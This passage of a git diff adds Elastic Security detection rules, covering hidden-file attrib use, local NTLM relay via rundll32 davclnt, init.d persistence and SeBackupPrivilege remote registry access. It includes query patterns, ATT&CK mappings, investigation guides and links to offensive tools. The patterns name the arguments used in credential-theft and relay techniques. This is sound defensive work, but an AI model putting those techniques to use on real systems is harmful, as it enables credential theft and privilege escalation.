47, + "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + }, + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "45d273fb-1dca-457d-9855-bcb302180c21_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_111.json b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_111.json new file mode 100644 index 00000000000..c3b4d2a2626 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4630d948-40d4-4cef-ac69-4002e29bc3db_111.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Adding Hidden File Attribute via Attrib", + "note": "## Triage and analysis\n\n### Investigating Adding Hidden File Attribute via Attrib\n\nThe `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. \n\nAttackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it.\n\nThis rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the target file or folder.\n - Examine the file, which process created it, header, etc.\n - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"attrib.exe\" or ?process.pe.original_file_name == \"ATTRIB.EXE\") and process.args : \"+h\" and\n not (process.parent.name: \"cmd.exe\" and process.command_line: \"attrib +R +H +S +A *.cui\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4630d948-40d4-4cef-ac69-4002e29bc3db", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + }, + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/", + "subtechnique": [ + { + "id": "T1222.001", + "name": "Windows File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "4630d948-40d4-4cef-ac69-4002e29bc3db_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_108.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_108.json new file mode 100644 index 00000000000..17bd4da619a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_108.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Local NTLM Relay via HTTP", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"rundll32.exe\" and\n\n /* Rundll32 WbeDav Client */\n process.args : (\"?:\\\\Windows\\\\System32\\\\davclnt.dll,DavSetCookie\", \"?:\\\\Windows\\\\SysWOW64\\\\davclnt.dll,DavSetCookie\") and\n\n /* Access to named pipe via http */\n process.args : (\"http*/print/pipe/*\", \"http*/pipe/spoolss\", \"http*/pipe/srvsvc\")\n", + "references": [ + "https://github.com/med0x2e/NTLMRelay2Self", + "https://github.com/topotam/PetitPotam", + "https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4682fd2c-cfae-47ed-a543-9bed37657aa6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1212", + "name": "Exploitation for Credential Access", + "reference": "https://attack.mitre.org/techniques/T1212/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "4682fd2c-cfae-47ed-a543-9bed37657aa6_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_109.json b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_109.json new file mode 100644 index 00000000000..262f1e4d678 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4682fd2c-cfae-47ed-a543-9bed37657aa6_109.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Local NTLM Relay via HTTP", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"rundll32.exe\" and\n\n /* Rundll32 WbeDav Client */\n process.args : (\"?:\\\\Windows\\\\System32\\\\davclnt.dll,DavSetCookie\", \"?:\\\\Windows\\\\SysWOW64\\\\davclnt.dll,DavSetCookie\") and\n\n /* Access to named pipe via http */\n process.args : (\"http*/print/pipe/*\", \"http*/pipe/spoolss\", \"http*/pipe/srvsvc\")\n", + "references": [ + "https://github.com/med0x2e/NTLMRelay2Self", + "https://github.com/topotam/PetitPotam", + "https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4682fd2c-cfae-47ed-a543-9bed37657aa6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1212", + "name": "Exploitation for Credential Access", + "reference": "https://attack.mitre.org/techniques/T1212/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "4682fd2c-cfae-47ed-a543-9bed37657aa6_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_9.json b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_9.json new file mode 100644 index 00000000000..37422a0a311 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/474fd20e-14cc-49c5-8160-d9ab4ba16c8b_9.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the \"systemd-sysv-generator\" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through init.d Detected", + "new_terms_fields": [ + "file.path", + "process.name", + "host.id" + ], + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not (\n (process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"dnf\" or \"chef-client\" or \"apk\" or \"yum\" or \"rpm\" or\n \"vmis-launcher\" or \"exe\" or \"platform-python\" or \"executor\" or \"podman\")) or\n (file.extension : (\"swp\" or \"swpx\")) or\n (process.name:mv and file.name:*.dpkg-remove) or\n (process.name:sed and file.name:sed*) or\n (process.name:systemd and file.name:*.dpkg-new)\n)\n", + "references": [ + "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", + "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#8-boot-or-logon-initialization-scripts-rc-scripts", + "https://www.cyberciti.biz/faq/how-to-enable-rc-local-shell-script-on-systemd-while-booting-linux-system/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "474fd20e-14cc-49c5-8160-d9ab4ba16c8b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "474fd20e-14cc-49c5-8160-d9ab4ba16c8b_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_110.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_110.json new file mode 100644 index 00000000000..da27b5115f6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_110.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Remote Registry Access via SeBackupPrivilege", + "note": "## Triage and analysis\n\n### Investigating Suspicious Remote Registry Access via SeBackupPrivilege\n\nSeBackupPrivilege is a privilege that allows file content retrieval, designed to enable users to create backup copies of the system. Since it is impossible to make a backup of something you cannot read, this privilege comes at the cost of providing the user with full read access to the file system. This privilege must bypass any access control list (ACL) placed in the system.\n\nThis rule identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the activities done by the subject user the login session. The field `winlog.event_data.SubjectLogonId` can be used to get this data.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate abnormal behaviors observed by the subject user such as network connections, registry or file modifications, and processes created.\n- Investigate if the registry file was retrieved or exfiltrated.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Limit or disable the involved user account to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=1m\n [iam where event.action == \"logged-in-special\" and\n winlog.event_data.PrivilegeList : \"SeBackupPrivilege\" and\n\n /* excluding accounts with existing privileged access */\n not winlog.event_data.PrivilegeList : \"SeDebugPrivilege\"]\n [any where event.action == \"Detailed File Share\" and winlog.event_data.RelativeTargetName : \"winreg\"]\n", + "references": [ + "https://github.com/mpgn/BackupOperatorToDA", + "https://raw.githubusercontent.com/Wh04m1001/Random/main/BackupOperators.cpp", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.PrivilegeList", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", + "setup": "## Setup\n\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.004", + "name": "LSA Secrets", + "reference": "https://attack.mitre.org/techniques/T1003/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_106.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_106.json new file mode 100644 index 00000000000..052a12d8585 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_106.json @@ -0,0 +1,113 @@ 